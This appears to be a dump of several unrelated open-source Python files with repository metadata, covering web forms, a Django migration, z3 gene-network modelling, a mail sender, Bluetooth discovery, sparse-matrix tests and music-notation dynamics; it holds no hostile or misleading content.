<gh_stars>0 from flask_wtf import FlaskForm from wtforms import StringField, SelectField, TextAreaField, SubmitField from wtforms.validators import Required class UpdateProfile(FlaskForm): bio = TextAreaField('Tell us a little about your awesome self.',validators = [Required()]) submit = SubmitField('Update') class BlogForm(FlaskForm): title = StringField('Title', validators=[Required()]) category = SelectField('Category', choices=[('Design','Design'),('Entertainment','Entertainment'),('Fashion & Style','Fashion & Style'),('Photography','Photograpgy'),('Business','Business')],validators=[Required()]) post = TextAreaField('Blog', validators=[Required()]) submit = SubmitField('Post') class CommentForm(FlaskForm): comment = TextAreaField('Leave a comment',validators=[Required()]) submit = SubmitField('Add Comment')
1.53125
2
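A sketch of how a form such as BlogForm above is typically consumed in a Flask view. Only the Flask-WTF calls (validate_on_submit(), .data, .errors) come from the library; the stand-in app, secret key, route, and import path are assumptions about the surrounding project.

from flask import Flask

from app.main.forms import BlogForm  # import path assumed from the file location above

app = Flask(__name__)             # stand-in app; the real project likely registers a blueprint
app.config['SECRET_KEY'] = 'dev'  # Flask-WTF needs a secret key for CSRF protection

@app.route('/blog/new', methods=['GET', 'POST'])
def new_blog():
    form = BlogForm()
    if form.validate_on_submit():  # True only for a valid POST with a CSRF token
        # Persisting the post is out of scope here; just echo the submitted fields.
        return 'Posted: %s (%s)' % (form.title.data, form.category.data)
    # On GET or failed validation the form would normally be rendered in a template.
    return str(form.errors)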
cookbook/migrations/0018_auto_20200216_2303.py
mhoellmann/recipes
0
12762667
<reponame>mhoellmann/recipes # Generated by Django 3.0.2 on 2020-02-16 22:03 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('cookbook', '0017_auto_20200216_2257'), ] operations = [ migrations.RenameModel( old_name='RecipeIngredients', new_name='RecipeIngredient', ), ]
0.59375
1
praeteritum/utils/Delegator.py
NoMariusz/Praeteritum
3
12762795
<reponame>NoMariusz/Praeteritum class Delegator(): """ Class implementing the Delegator pattern for its children, letting them automatically use functions and methods from _delegate_subsystems and so reducing boilerplate code. !!! Be aware that a Delegator cannot delegate methods from children that themselves implement Delegator """ def __init__(self): # prepare list of instances to delegate work to if not self._delegate_subsystems: self._delegate_subsystems: list[object] = [] # prepare dict with subsystems and their methods self._subsystems_dicts = [ { "subsystem": s, "methods": [ f for f in dir(s) if not f.startswith('_') ] } for s in self._delegate_subsystems ] def __getattr__(self, func): """ Delegate all public methods of the subsystems to self """ def method(*args): # get list of subsystems providing the requested method results = list(filter( lambda subsystem_data: func in subsystem_data["methods"], self._subsystems_dicts)) # if there is a match, call that subsystem's method and return its result if len(results) > 0: return getattr(results[0]["subsystem"], func)(*args) else: # raise an error if not found raise AttributeError return method
2.65625
3
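A usage sketch for the Delegator class above: a child sets _delegate_subsystems before calling the parent constructor, and every public method of a subsystem then becomes callable on the child. Engine, Radio and Car are made-up classes for illustration.

class Engine(object):
    def start(self):
        return 'engine started'

class Radio(object):
    def play(self, station):
        return 'playing %s' % station

class Car(Delegator):
    def __init__(self):
        # Subsystems must exist before Delegator.__init__ builds its method map.
        self._delegate_subsystems = [Engine(), Radio()]
        super().__init__()

car = Car()
assert car.start() == 'engine started'     # resolved via Engine
assert car.play('jazz') == 'playing jazz'  # resolved via Radio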
utility.py
syaoming/molle
0
12762923
from z3 import * from operator import or_ from pprint import pprint def _sorted_inters(inter_list, sp): ''' Sorts the inter_list = [('from', 'to', 'positive'), ...] into a dict, where keyvalue is a couple of number tuples, wich integer codes as keys. e.g. {1: ( (2, 3), (5, 9) )} : species 1 is activated by 2 and 3, and repressed by 5 and 9. ''' d = dict([(c, ([], [])) for c in range(len(sp))]) # initialization for i in inter_list: f, t = i[:2] if 'negative' in i: idx = 1 elif 'positive' in i: idx = 0 else: print 'no +/- assigend to interactions %d'%(inter_list) raise(Error) tcode, fcode = sp.index(t), sp.index(f) d.setdefault(tcode, ([], []))[idx].append(fcode) return d def readModel(f, opmt = True): ''' Take a file Object as input, return a tuple of 6 objects: species: a tuple of gene name. logics : a dict. { gene_name: list_of_allowed_logic_numbers } kofe : a dict. { "FE": list_of_FEable_gene, "KO": list_of_KOable_gene } defI : a dict of defined interations. Processed by _sorted_inters() optI : a dict of optional interactions. ''' species = [] logics = {} kofe = {'KO':[], 'FE':[]} def_inters_list = [] opt_inters_list = [] # read the components line for c in f.readline().strip().split(','): # get the gene name and +- mark if '(' in c : gene_ = c[:c.index('(')].strip() else: gene_ = c.strip() gene = filter(lambda x: not x in '+-', gene_) mark = filter(lambda x: x in '+-', gene_) # add to kofe if the gene has mark if('+' in mark): kofe['FE'].append(gene) if('-' in mark): kofe['KO'].append(gene) # record the allowed logics; if no, set to range(18) if '(' in c: left, right = c.index('('), c.index(')') rules = tuple( int(i) for i in c[left+1:right].split() ) else: rules = tuple(range(18)) logics[gene] = rules species.append(gene) # read the interaction lines total_opt = total_def = 0 for line in f.readlines(): l = line.strip().split() if(not l): continue # skip empty line if 'optional' in l: opt_inters_list.append(tuple(l[:3])) total_opt += 1 else: def_inters_list.append(tuple(l[:3])) total_def += 1 defI = _sorted_inters(def_inters_list, species) optI = _sorted_inters(opt_inters_list, species) return (species, logics, kofe, defI, optI) # kept from old version def _addExp(d, name, time_point, state_names_list): d.setdefault(name, []).append( (int(time_point), state_names_list) ) # kept from old version def _addState(d, state_name, gene, value): d.setdefault(state_name, []).append( (gene, int(value)) ) # kept from old version def readExp(f): ''' Take the file for experiment constrains, return two dicts: exps: the Experimental constrains for every experiment states: records the mapping of shortcut name to node states ''' exps = dict() states = dict() shortcut = '' for l in f.readlines(): l = l.strip(); if(not l): continue; # skip empty line try: l = l[:l.index('"')] # remove commment except ValueError: None try: l = l[:l.index(';')] # remove ; except ValueError: None if(shortcut): # inside the braket { } if(l[0] == '{'): continue # skip left bracket elif(l[0] == '}'): shortcut = '' # exit the braket; else: (left, right) = l.split('='); name = left.strip(); value = right.split()[0]; _addState(states, shortcut, name, value); # record configuration l = l.split(); if(l[0] == "//"): continue # comment line elif(l[0] == "under"): _addExp(exps, l[1], l[3], l[4:]) # recordexp elif(l[0] == "let"): shortcut = l[1]; # ready to enter the braket try: shortcut = shortcut[:shortcut.index(':')] except ValueError: None return (exps, states); def compati(l, actn, repn): ''' Speed up the solving. 
Not sure with the validicity when actn == 0 of such approach. ''' if len(l) < 16: return l if actn == 0: if repn == 0: return (-1, ) else: # only repressors return filter(lambda x: x > 15, l) or (-1, ) elif repn == 0: # only activator return filter(lambda x: x < 2, l) or (-1, ) else: return l zero = BitVecVal(0, 1) def Any(bvs): return reduce(or_, bvs, zero) def _concat(bvs): if len(bvs) == 1: return bvs[0] else: return Concat(bvs) def _create_bit_rule(num, act_list, rep_list, A, R): ''' Create the update rule that return bit-vector of length 1. ''' if num == -1: return BoolVal(False) # special case # initialization if act_list: act = _concat(act_list) else: act = A = zero if rep_list: rep = _concat(rep_list) else: rep = R = zero # creating result if num == 0: return And(R == 0, A != 0, A & act == A) elif num == 1: return And(R == 0, A & act != 0) #return And(R == 0, A != 0, A & act != 0) elif num == 2: return Or( And(R == 0, A != 0, A & act == A), And(R != 0, rep & R == 0, A & act != 0) ) #return Or( And(R == 0, A != 0, A & act == A), # And(R != 0, A != 0, rep & R == 0, A & act != 0) ) elif num == 3: return And(A & act != 0, rep & R == 0) elif num == 4: return And( A != 0, A & act == A, Or(R == 0, rep & R != R) ) #return Or( And(R == 0, A != 0, A & act == A), # And(A != 0, A & act == A, rep & R != R) ) #return Or( And(R == 0, A != 0, A & act == A), # And(R != 0, A != 0, A & act == A, rep & R != R) ) elif num == 5: return Or( And(R == 0, act & A != 0), And(A != 0, act & A == A, rep & R != R) ) #return Or( And(R == 0, A != 0, act & A != 0), # And(R != 0, A != 0, act & A == A, rep & R != R) ) elif num == 6: return Or( And(R == 0, A != 0, act & A == A), And(act & A != 0, rep & R != R) ) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, act & A != 0, rep & R != R) ) elif num == 7: return Or( And(R == 0, act & A != 0), And(act & A != 0, rep & R != R) ) #return Or( And(R == 0, A != 0, act & A != 0), # And(R != 0, A != 0, act & A != 0, rep & R != R) ) elif num == 8: return And(A != 0, act & A == A) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, act & A == A) ) elif num == 9: return Or( And(R == 0, act & A != 0), And(R != 0, A != 0, act & A == A) ) #return Or( And(R == 0, A != 0, act & A != 0), # And(R != 0, A != 0, act & A == A) ) elif num == 10: return Or( And(A != 0, act & A == A), And(R != 0, act & A != 0, rep & R == 0) ) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, Or(act & A == A, # And(act & A != 0, rep & R == 0))) ) elif num == 11: return Or( And(R == 0, A != 0, act & A != 0), And(R != 0, A != 0, Or(act & A == A, And(act & A != 0, rep & R == 0))) ) elif num == 12: return Or( And(A != 0, act & A == A), And(act & A != 0, rep & R != R) ) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, Or(act & A == A, # And(act & A != 0, rep & R != R))) ) elif num == 13: return Or( And(R == 0, A != 0, act & A != 0), And(R != 0, A != 0, Or(act & A == A, And(act & A != 0, rep & R != R))) ) elif num == 14: return Or( And(R == 0, A != 0, act & A == A), And(R != 0, act & A != 0) ) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, act & A != 0) ) elif num == 15: return act & A != 0 #return Or( And(R == 0, A != 0, act & A != 0), # And(R != 0, A != 0, act & A != 0) ) elif num == 16: return And(A == 0, rep & R != 0, rep & R != R) #return And(A == 0, R != 0, rep & R != 0, rep & R != R) elif num == 17: return And(A == 0, R != 0, rep & R == 0) else: print "Strange Num" raise ValueError def _with_kofe(kofe_idx, ko, fe, 
expr): koc, fec = kofe_idx if koc: ko = Extract(koc-1,koc-1,ko) == 1 # a trick to avoid 0 == False if fec: fe = Extract(fec-1,fec-1,fe) == 1 return Or(fe, And(Not(ko), expr)) else: return And(Not(ko), expr) elif fec: fe = Extract(fec-1,fec-1,fe) == 1 return Or(fe, expr) else: return expr def makeFunction(acts, reps, kofe_index, logic, A, R): ''' Makes a function that takes q, A, R, and return a coresponding z3 expr. A is the acticators-selecting bit-vector, R for repressors. ''' return lambda q, ko, fe: simplify( _with_kofe(kofe_index, ko, fe, _create_bit_rule(logic, [Extract(i,i,q) for i in acts], [Extract(i,i,q) for i in reps], A, R))) def isExpOf2(bvv): return len(filter(lambda x: x == '1', bin(bvv.as_long()))) == 1 ### Output Utilities ### ######################### boolf = BoolVal(False) def conv_time(secs, th = 300): if secs > th: return '%.1f min'%( secs / 60 ) return '%.1f sec'%secs def _Or(l): if(not l): return boolf if(len(l) == 1): return l[0] else: return Or(l); def _And(l): if(not l): return boolf if(len(l) == 1): return l[0] else: return And(l); def _create_sym_rule(num, act, rep): if num < -1 or num > 17: return Bool('Strang, num=%d, act=%s, rep=%s'%(num,str(act), str(rep))) if num == -1: return boolf if act: actt = [Bool(node) for node in act] if rep: rept = [Bool(node) for node in rep] if act: if not rep: if num%2 == 0: return _And(actt) else: return _Or(actt) elif num == 0: return boolf elif num == 1: return boolf elif(num < 4): return And(_Or(actt), Not(_Or(rept))) elif(num < 6): return And(_And(actt), Not(_And(rept))); elif(num < 8): return And(_Or(actt), Not(_And(rept))) elif(num < 10): return _And(actt) elif(num < 12): return Or(_And(actt), And(_Or(actt), Not(_Or(rept)))) elif(num < 14): return Or(_And(actt), And(_Or(actt), Not(_And(rept)))) elif(num < 16): return _Or(actt) else: return boolf if rep: if num == 16: return And(_Or(rept), Not(_And(rept))) elif num==17: return Not(_Or(rept)); else: return boolf else: return boolf # no act no rep def checkBit(i, bv): # simplify is necessary return simplify(Extract(i, i, bv)).as_long() == 1 def bv2logic(lbvv, llist): ''' convert a bit-vector to a integer, as logic function number.''' assert isExpOf2(lbvv) lcode = len(bin(lbvv.as_long()).lstrip('0b')) - 1 return llist[lcode] def bv2inters(ibvv, ilist, species): if is_true(simplify(ibvv == 0)): return [] assert is_false(simplify(ibvv == 0)) l = ibvv.size() - 1 return [species[c] for i, c in enumerate(ilist) if checkBit(l-i, ibvv)] def getDetail(m, A_, R_, L_, species, inters, logics): A = {}; R = {}; L = {} for c, s in enumerate(species): L[s] = bv2logic(m[L_[s]], logics[s]) if A_[s]: A[s] = bv2inters(m[A_[s]] or zero, inters[c][0], species) else: A[s] = [] if R_[s]: R[s] = bv2inters(m[R_[s]] or zero, inters[c][1], species) else: R[s] = [] return (A, R, L) def printModel(species, A, R, L, config = True, model = True): ''' Print the solved model nicely. 
''' # printing the model if config: print ">>\tConfigurations: " for s in species: print ">>\t\t%s:%d%s%s" \ %(s, L[s], A[s] and '\t<- ' + ','.join(A[s]) or '', R[s] and '\t|- ' + ','.join(R[s]) or '') if model: print ">>\tModel: " for s in species: print ">>\t\t%s' = %s" \ %(s,simplify( _create_sym_rule(L[s], A[s], R[s]) )) from smtplib import SMTP, SMTPAuthenticationError from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText def mailMe(addr, pw, content, title = 'Computation Finished'): msg = MIMEMultipart('alternative') msg['Subject'] = title msg['From'] = msg['To'] = addr msg.attach(MIMEText(content, 'plain')) server = SMTP('smtp.qq.com') try: server.login(addr, pw) server.sendmail(addr, addr, msg.as_string()) server.quit() except SMTPAuthenticationError: print ">> SMTP: login fail with %s:%s"%(addr, pw)
2.484375
2
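The readModel() parser above implies a small plain-text model format: a first line of comma-separated components, each optionally marked with '+' (force-expressible) or '-' (knock-out-able) and optionally followed by a parenthesised list of allowed logic numbers, then one interaction per line as 'from to positive|negative [optional]'. A hedged round-trip example (Python 2, run next to utility.py; the gene names and numbers are invented):

from StringIO import StringIO

from utility import readModel

model_text = """A+(0 1 2), B-, C
A B positive
B C negative optional
"""
species, logics, kofe, defI, optI = readModel(StringIO(model_text))
print species      # ['A', 'B', 'C']
print kofe['FE']   # ['A']  (the '+' mark makes A force-expressible)
print kofe['KO']   # ['B']  (the '-' mark makes B knock-out-able)
print logics['B']  # all 18 logic numbers, since B has no parenthesised list
print defI[1]      # ([0], [])  B is definitely activated by A
print optI[2]      # ([], [1])  C is optionally repressed by B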
Archive for old stuff/BluetoothServer/Old/gatt-python.py
Kandidatarbete-Chalmers-MCCX02-19-06/RaspberryPiRadarProgram
7
12763051
import gatt class AnyDeviceManager(gatt.DeviceManager): def device_discovered(self, device): print("Discovered [%s] %s" % (device.mac_address, device.alias())) manager = AnyDeviceManager(adapter_name='hci0') manager.start_discovery() manager.run()
1.273438
1
models/__init__.py
doslindos/ml_crapwrap
0
12763179
from numpy import save as npsave, load as npload, array as nparray, append as npappend, expand_dims as npexpand, prod as npprod, argmax, zeros as npzeros from datetime import datetime from json import dump as jsondump, load as jsonload from pickle import dump as pkldump, load as pklload from inspect import signature from os import getcwd from collections import deque from sys import exit from pathlib import Path from sklearn import decomposition as skdecomposition, cluster as skcluster from utils.functions import run_function from utils.datasets import get_dataset_info from utils.modules import fetch_model, get_module from UI.GUI_utils import open_dirGUI from .util.model_handling_functions import save_configuration, save_weights, save_sk_model, load_weights, load_sk_model, load_configuration, handle_init, create_prediction_file, map_params, select_weights, read_prediction_file from .model_handler import ModelHandler
1.445313
1
tests/test_route.py
kr41/TraversalKit
4
12763307
<gh_stars>1-10 import re from traversalkit.route import Node, Route def test_node(): node = Node(object, name='foo') assert str(node) == 'foo' assert repr(node) == '<Node: foo>' assert node.type == 'single' node = Node(object, metaname='foo') assert str(node) == '{foo}' assert repr(node) == '<Node: {foo}>' assert node.type == 'set' node = Node(object, pattern=re.compile('.*')) assert str(node) == '{.*}' assert repr(node) == '<Node: {.*}>' assert node.type == 'set' node = Node(object) assert str(node) == '*' assert repr(node) == '<Node: *>' assert node.type == 'set' def test_path(): path = Route() assert path.uri == '*' assert repr(path) == '<Route: *>' assert len(path) == 0 path += Node(object, name='') assert path.uri == '/' assert repr(path) == '<Route: />' assert len(path) == 1 path += [Node(object, name='foo'), Node(object, metaname='bar')] assert path.uri == '/foo/{bar}/' assert repr(path) == '<Route: /foo/{bar}/>' assert len(path) == 3
2.15625
2
silx/opencl/test/test_sparse.py
physwkim/silx
2
12763435
<filename>silx/opencl/test/test_sparse.py #!/usr/bin/env python # coding: utf-8 # /*########################################################################## # # Copyright (c) 2018-2019 European Synchrotron Radiation Facility # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # ###########################################################################*/ """Test of the sparse module""" import numpy as np import unittest import logging from itertools import product from ..common import ocl if ocl: import pyopencl.array as parray from silx.opencl.sparse import CSR try: import scipy.sparse as sp except ImportError: sp = None logger = logging.getLogger(__name__) def generate_sparse_random_data( shape=(1000,), data_min=0, data_max=100, density=0.1, use_only_integers=True, dtype="f"): """ Generate random sparse data where. Parameters ------------ shape: tuple Output data shape. data_min: int or float Minimum value of data data_max: int or float Maximum value of data density: float Density of non-zero elements in the output data. Low value of density mean low number of non-zero elements. use_only_integers: bool If set to True, the output data items will be primarily integers, possibly casted to float if dtype is a floating-point type. This can be used for ease of debugging. 
dtype: str or numpy.dtype Output data type """ mask = np.random.binomial(1, density, size=shape) if use_only_integers: d = np.random.randint(data_min, high=data_max, size=shape) else: d = data_min + (data_max - data_min) * np.random.rand(*shape) return (d * mask).astype(dtype) @unittest.skipUnless(ocl and sp, "PyOpenCl/scipy is missing") class TestCSR(unittest.TestCase): """Test CSR format""" def setUp(self): # Test possible configurations input_on_device = [False, True] output_on_device = [False, True] dtypes = [np.float32, np.int32, np.uint16] self._test_configs = list(product(input_on_device, output_on_device, dtypes)) def compute_ref_sparsification(self, array): ref_sparse = sp.csr_matrix(array) return ref_sparse def test_sparsification(self): for input_on_device, output_on_device, dtype in self._test_configs: self._test_sparsification(input_on_device, output_on_device, dtype) def _test_sparsification(self, input_on_device, output_on_device, dtype): current_config = "input on device: %s, output on device: %s, dtype: %s" % ( str(input_on_device), str(output_on_device), str(dtype) ) logger.debug("CSR: %s" % current_config) # Generate data and reference CSR array = generate_sparse_random_data(shape=(512, 511), dtype=dtype) ref_sparse = self.compute_ref_sparsification(array) # Sparsify on device csr = CSR(array.shape, dtype=dtype) if input_on_device: # The array has to be flattened arr = parray.to_device(csr.queue, array.ravel()) else: arr = array if output_on_device: d_data = parray.empty_like(csr.data) d_indices = parray.empty_like(csr.indices) d_indptr = parray.empty_like(csr.indptr) d_data.fill(0) d_indices.fill(0) d_indptr.fill(0) output = (d_data, d_indices, d_indptr) else: output = None data, indices, indptr = csr.sparsify(arr, output=output) if output_on_device: data = data.get() indices = indices.get() indptr = indptr.get() # Compare nnz = ref_sparse.nnz self.assertTrue( np.allclose(data[:nnz], ref_sparse.data), "something wrong with sparsified data (%s)" % current_config ) self.assertTrue( np.allclose(indices[:nnz], ref_sparse.indices), "something wrong with sparsified indices (%s)" % current_config ) self.assertTrue( np.allclose(indptr, ref_sparse.indptr), "something wrong with sparsified indices pointers (indptr) (%s)" % current_config ) def test_desparsification(self): for input_on_device, output_on_device, dtype in self._test_configs: self._test_desparsification(input_on_device, output_on_device, dtype) def _test_desparsification(self, input_on_device, output_on_device, dtype): current_config = "input on device: %s, output on device: %s, dtype: %s" % ( str(input_on_device), str(output_on_device), str(dtype) ) logger.debug("CSR: %s" % current_config) # Generate data and reference CSR array = generate_sparse_random_data(shape=(512, 511), dtype=dtype) ref_sparse = self.compute_ref_sparsification(array) # De-sparsify on device csr = CSR(array.shape, dtype=dtype, max_nnz=ref_sparse.nnz) if input_on_device: data = parray.to_device(csr.queue, ref_sparse.data) indices = parray.to_device(csr.queue, ref_sparse.indices) indptr = parray.to_device(csr.queue, ref_sparse.indptr) else: data = ref_sparse.data indices = ref_sparse.indices indptr = ref_sparse.indptr if output_on_device: d_arr = parray.empty_like(csr.array) d_arr.fill(0) output = d_arr else: output = None arr = csr.densify(data, indices, indptr, output=output) if output_on_device: arr = arr.get() # Compare self.assertTrue( np.allclose(arr.reshape(array.shape), array), "something wrong with densified data (%s)" % current_config ) 
def suite(): suite = unittest.TestSuite() suite.addTest( unittest.defaultTestLoader.loadTestsFromTestCase(TestCSR) ) return suite if __name__ == '__main__': unittest.main(defaultTest="suite")
1.414063
1
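For reference, the data/indices/indptr triplet that the test above compares against is scipy's CSR layout; a tiny example on an arbitrary 2x3 matrix:

import numpy as np
import scipy.sparse as sp

a = np.array([[0, 3, 0],
              [4, 0, 5]])
m = sp.csr_matrix(a)
print(m.data)     # [3 4 5]   non-zero values, stored row by row
print(m.indices)  # [1 0 2]   column index of each stored value
print(m.indptr)   # [0 1 3]   row i owns data[indptr[i]:indptr[i+1]]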
consort/tools/SimpleDynamicExpression.py
josiah-wolf-oberholtzer/consort
9
12763563
<filename>consort/tools/SimpleDynamicExpression.py<gh_stars>1-10 import abjad from abjad import attach from abjad import inspect from abjad import iterate from abjad import override from abjad.tools import abctools from abjad.tools import indicatortools from abjad.tools import instrumenttools from abjad.tools import selectiontools from abjad.tools import spannertools class SimpleDynamicExpression(abctools.AbjadValueObject): r'''A dynamic expression. .. container:: example :: >>> dynamic_expression = consort.SimpleDynamicExpression( ... hairpin_start_token='sfp', ... hairpin_stop_token='<PASSWORD>', ... ) :: >>> staff = abjad.Staff("c'8 d'8 e'8 f'8 g'8 a'8 b'8 c''8") >>> dynamic_expression(staff[2:-2]) >>> print(format(staff)) \new Staff { c'8 d'8 \override Hairpin.circled-tip = ##t e'8 \> \sfp f'8 g'8 \revert Hairpin.circled-tip a'8 \! b'8 c''8 } .. container:: example :: >>> dynamic_expression = consort.SimpleDynamicExpression( ... 'f', 'p', ... ) >>> staff = abjad.Staff("c'8 d'8 e'8 f'8 g'8 a'8 b'8 c''8") >>> dynamic_expression(staff[2:-2]) >>> print(format(staff)) \new Staff { c'8 d'8 e'8 \> \f f'8 g'8 a'8 \p b'8 c''8 } ''' ### CLASS VARIABLES ### __slots__ = ( '_hairpin_start_token', '_hairpin_stop_token', '_minimum_duration', ) ### INITIALIZER ### def __init__( self, hairpin_start_token='p', hairpin_stop_token=None, minimum_duration=abjad.Duration(1, 4), ): known_dynamics = indicatortools.Dynamic._dynamic_names assert hairpin_start_token in known_dynamics, \ (known_dynamics, hairpin_start_token) if hairpin_stop_token is not None: assert hairpin_stop_token in known_dynamics assert hairpin_start_token != '<PASSWORD>' or hairpin_stop_token != '<PASSWORD>' if hairpin_start_token == '<PASSWORD>': assert hairpin_stop_token is not None self._hairpin_start_token = hairpin_start_token self._hairpin_stop_token = hairpin_stop_token if minimum_duration is not None: minimum_duration = abjad.Duration(minimum_duration) self._minimum_duration = minimum_duration ### SPECIAL METHODS ### def __call__(self, music, name=None): if not isinstance(music, selectiontools.Selection): music = selectiontools.Selection(music) is_short_group = False if len(music) < 2: is_short_group = True elif self.minimum_duration is not None: if music.get_duration() < self.minimum_duration: is_short_group = True instrument = abjad.inspect(music[0]).get_effective( instrumenttools.Instrument, ) logical_ties = tuple(iterate(music).by_logical_tie(pitched=True)) if len(logical_ties) < 3: if instrument == instrumenttools.Piano() or \ instrument == instrumenttools.Percussion(): is_short_group = True grace_notes = None previous_leaf = abjad.inspect(music[0]).get_leaf(-1) if previous_leaf is not None: after_grace = abjad.inspect(previous_leaf).get_after_grace_container() if after_grace is not None: grace_notes = list(iterate(after_grace).by_leaf()) music = selectiontools.ContiguousSelect( tuple(grace_notes) + tuple(music), ) start_token = self.hairpin_start_token stop_token = self.hairpin_stop_token if is_short_group or stop_token is None: if start_token == '<PASSWORD>': start_token = stop_token if start_token.startswith('fp'): start_token = start_token[1:] command = indicatortools.LilyPondCommand(start_token, 'right') attach(command, music[0], name=name) return start_ordinal = NegativeInfinity if start_token != 'n<PASSWORD>': start_ordinal = indicatortools.Dynamic.dynamic_name_to_dynamic_ordinal( start_token) stop_ordinal = NegativeInfinity if stop_token != 'n<PASSWORD>': stop_ordinal = 
indicatortools.Dynamic.dynamic_name_to_dynamic_ordinal(stop_token) items = [] is_circled = False if start_ordinal < stop_ordinal: if start_token != 'n<PASSWORD>': items.append(start_token) else: is_circled = True items.append('<') items.append(stop_token) elif stop_ordinal < start_ordinal: items.append(start_token) items.append('>') if stop_token != 'n<PASSWORD>': items.append(stop_token) else: #items.append('!') is_circled = True hairpin_descriptor = ' '.join(items) hairpin = spannertools.Hairpin( descriptor=hairpin_descriptor, include_rests=False, ) if is_circled: override(hairpin).hairpin.circled_tip = True attach(hairpin, music, name=name) ### PUBLIC PROPERTIES ### @property def hairpin_start_token(self): return self._hairpin_start_token @property def hairpin_stop_token(self): return self._hairpin_stop_token @property def minimum_duration(self): return self._minimum_duration
1.773438
2
remove_duplicates.py
AnneliektH/EVEs_arthropod
0
12763691
<reponame>AnneliektH/EVEs_arthropod
#<NAME>, 2017
# load pandas
import pandas as pd
import sys

# load dataframe (first column is the index)
df = pd.read_csv(sys.argv[1], index_col=0)

# sort on position on query start to keep the highest later on
df.sort_values('position_on_query_start', inplace=True)

# drop duplicates based on start and direction, keep first (the highest)
df.drop_duplicates(["direction", "position_on_query_start"], inplace=True, keep="first")

# sort on position on query stop to keep the highest later on
df.sort_values("position_on_query_stop", inplace=True)

# drop duplicates based on stop and direction, keep first (the highest)
df.drop_duplicates(["direction", "position_on_query_stop"], inplace=True, keep="first")

print(len(df))

# write out the de-duplicated dataframe
df.to_csv(sys.argv[2])
2.203125
2
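For reference, the script above is run as `python remove_duplicates.py <input.csv> <output.csv>`; the following illustrative sketch (not part of the repository) applies the same sort/drop_duplicates steps to a small in-memory DataFrame with the column names the script expects.

import pandas as pd

# toy hits with the columns the script operates on
df = pd.DataFrame({
    "direction": ["+", "+", "-"],
    "position_on_query_start": [100, 100, 250],
    "position_on_query_stop": [400, 380, 500],
})

# keep one hit per (direction, start) and per (direction, stop), as in the script above
df = df.sort_values("position_on_query_start")
df = df.drop_duplicates(["direction", "position_on_query_start"], keep="first")
df = df.sort_values("position_on_query_stop")
df = df.drop_duplicates(["direction", "position_on_query_stop"], keep="first")

print(len(df))  # 2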
mail.py
FilippoRanza/mail.py
0
12763819
<gh_stars>0 #! /usr/bin/python3 # Copyright (c) 2019 <NAME> <<EMAIL>> from argparse import ArgumentParser from mail_sender import message_builder, load_destination DEFAULT_SUBJECT = "A message from mail.py" DEFAULT_CONFIG_FILE = "/etc/mail_config.json" def setup_argparser(): out = ArgumentParser() out.add_argument('-d', '--destination', required=True, nargs='+', help='''Set destination addresse[es], this argument can be a file in this case adress[es] are read from it, addresses are line or spece separated''') out.add_argument('-s', '--subject', default=DEFAULT_SUBJECT, help='specify subject') out.add_argument('-c', '--config', default=DEFAULT_CONFIG_FILE, help='specify configuration file') out.add_argument('-a', '--attachment', default=None, nargs='+', help='add attachment file, just one') out.add_argument('-f', '--file', default=None, help="specify message file") return out def main(): parser = setup_argparser() args = parser.parse_args() if args: mail = message_builder(args.config, args.attachment, args.subject, args.file) dst = load_destination(args.destination) mail.send_mail(dst) if __name__ == "__main__": main()
1.664063
2
where/cleaners/removers/__init__.py
ingridfausk/where
16
12763947
<gh_stars>10-100 """Framework for removing observations Description: ------------ Each remover should be defined in a separate .py-file. The function inside the .py-file that should be called needs to be decorated with the :func:`~midgard.dev.plugins.register` decorator as follows:: from midgard.dev import plugins @plugins.register def ignore_station(dset): ... """ # Standard library imports from typing import Any, Dict # External library imports import numpy as np # Midgard imports from midgard.dev import plugins # Where imports from where.lib import config from where.lib import log def apply_removers(config_key: str, dset: "Dataset") -> None: """Apply all removers for a given session Args: config_key: The configuration key listing which removers to apply. dset: Dataset containing analysis data. """ prefix = dset.vars["pipeline"] removers = config.tech[config_key].list log.info(f"Applying removers") keep_idxs = plugins.call_all(package_name=__name__, plugins=removers, prefix=prefix, dset=dset) all_keep_idx = np.ones(dset.num_obs, dtype=bool) for remover, remover_keep_idx in keep_idxs.items(): log.info(f"Removing {sum(np.logical_not(remover_keep_idx)):5d} observations based on {remover}") all_keep_idx = np.logical_and(all_keep_idx, remover_keep_idx) log.info(f"Keeping {sum(all_keep_idx)} of {dset.num_obs} observations") dset.subset(all_keep_idx) if dset.num_obs == 0: log.fatal("No observations are available.") def apply_remover(remover: str, dset: "Dataset", **kwargs: Dict[Any, Any]) -> None: """Apply defined remover for a given session Args: remover: The remover name. dset: Dataset containing analysis data. kwargs: Input arguments to the remover. """ log.info(f"Apply remover {remover!r}") keep_idx = plugins.call(package_name=__name__, plugin_name=remover, dset=dset, **kwargs) log.info(f"Keeping {sum(keep_idx)} of {dset.num_obs} observations") dset.subset(keep_idx) if dset.num_obs == 0: log.fatal("No observations are available.")
1.914063
2
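Following the pattern described in the module docstring above, a new remover is a small module in this package whose registered function returns a boolean keep-index of length dset.num_obs. A minimal hypothetical sketch follows; the ignore_station file name, the station names, and the dset.station field access are assumptions for illustration.

# where/cleaners/removers/ignore_station.py (hypothetical)

# External library imports
import numpy as np

# Midgard imports
from midgard.dev import plugins


@plugins.register
def ignore_station(dset: "Dataset") -> np.ndarray:
    """Keep all observations except those from a hard-coded set of stations."""
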